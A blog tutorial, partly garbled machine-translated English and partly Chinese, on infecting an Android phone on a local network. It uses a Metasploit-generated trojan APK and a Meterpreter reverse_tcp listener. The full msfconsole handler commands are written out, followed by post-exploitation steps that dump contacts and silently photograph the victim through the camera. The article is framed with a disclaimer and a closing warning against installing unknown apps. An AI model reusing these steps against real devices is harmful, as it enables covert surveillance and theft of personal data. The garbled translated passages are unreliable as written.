Foreword
Solemn statement : This article is limited to technical discussions and sharing is strictly prohibited for illegal means.
Purpose of this article : demonstrates how to use Kali Linuxthe system Metasploitpenetration testing framework generates a remote control Trojans, and then infect Android phones within the local area network, enabling mobile phones to victims of reading data, audio eavesdropping, access location, such as software installation or uninstallation.
Environment Description
| machine | IP addresses |
|---|---|
| Win10 physical host | 192.168.0.105 |
| Kali virtual machine | 192.168.0.199 |
| honor 8 test phone | 192.168.0.107 |
Win10 host and mobile phone should be connected with a WIFI, Kali virtual machine installed in VMware, a bridge mode may be configured such that its IP address with the physical host, in a mobile phone in the same segment, forming a small local area network.
On how to configure the virtual machine's IP and network, please visit another blog post: penetration testing -Kali virtual machine .
Ready to attack
Trojan generator
1, said first point nonsense to Kali confirmation virtual machine configured IP address:
2, enter the following command terminal Kali Kali virtual machine /rootgenerating the Trojan file path 520.apk:
Transmission Trojans
Remote control Trojan file has been generated, but how virtual machine transfers from Kali to Win10 physical host and further transmission to the victim phone?
1, a remote connection Xshell tool SFTP protocol follows the new file transfer session:
2, while Kali configured with a remote host butt local folder, the default host 10 to transfer files storage path Win:
3, enter kali host account and password to log in, and after a successful connection, use the command get 520.apkto download a trojan from Kali host file to a local folder D:\Codeat:
4, Win 10 hosts in a local folder to confirm whether the next file is downloaded successfully:
Install Trojan
1、再废话一下,查看并确认华为测试手机的IP地址与 Kali 虚拟机、Win 10主机在同一网段内:
2、在 Kali 虚拟机里查看能否连通手机(这是后续攻击成功的基础):
3、在 Win 10 主机打开QQ程序,向华为手机发送木马文件并安装(这个就不用演示了吧…),安装后如下:
开始攻击
MSF监听
Kali 终端依次执行以下命令:
msfconsole //启动msfconsole
use exploit/multi/handler //加载模块
set payload android/meterpreter/reverse_tcp //选择Payload
set lhost 192.168.0.199 //这里的地址设置成我们刚才生成木马的IP地址
set lport 9999 //这里的端口设置成刚才我们生成木马所监听的端口
exploit //开始执行漏洞,开始监听,等待手机上线
1、在 Kali 终端输入msfconsole命令启动Metasploit框架:
2、依次以下执行命令加载攻击模块、选择Payload、设置本地监听主机的IP和端口:
3、执行命令exploit,开始执行攻击程序,进入监听状态,等待目标手机上线(用户点击木马程序):
4、此时手动点击刚才手机中安装的MainActivity程序图标(没有界面),则可成功建立攻击会话:
5、此时输入help命令可查看具体的攻击命令和描述,后面将选择几个进行演示:
命令行执行
成功建立攻击会话后可以对受害者手机进行像Linux主机shell一样对手机进行命令执行操作:
通讯录下载
1、在攻击会话中执行dump_contacts命令导出受害者手机通讯录里的信息到 Kali 虚拟机/root路径下:
2、在虚拟机中查看一下导出来的通讯录文件:
3、同理可导出受害者手机中的短信记录、通话记录……但是此手机没有插手机卡(穷……),故此处不做演示了。
摄像机拍摄
在攻击会话中执行命令webcam_snap ,可开启受害者的摄像头自动拍摄一张照片并保存到Kali 虚拟机中:
同理还可以非法调用受害者手机的录音功能、屏幕截图功能……
At this point, the system generates this Kali remote control Trojan attacks end of the presentation LAN Android phone, attack other readers are interested operations can make use of self- helpcommand given attack command description to experience.
Reminder : Trojan horse program does not disguise the presentation of graphical interface, real-world environment that will disguise the attacker takes a normal software, which reminds us Do not install unknown software security, and do not easily connected public WIFI, so that their equipment is exposed to an attacker set up a local area network ......
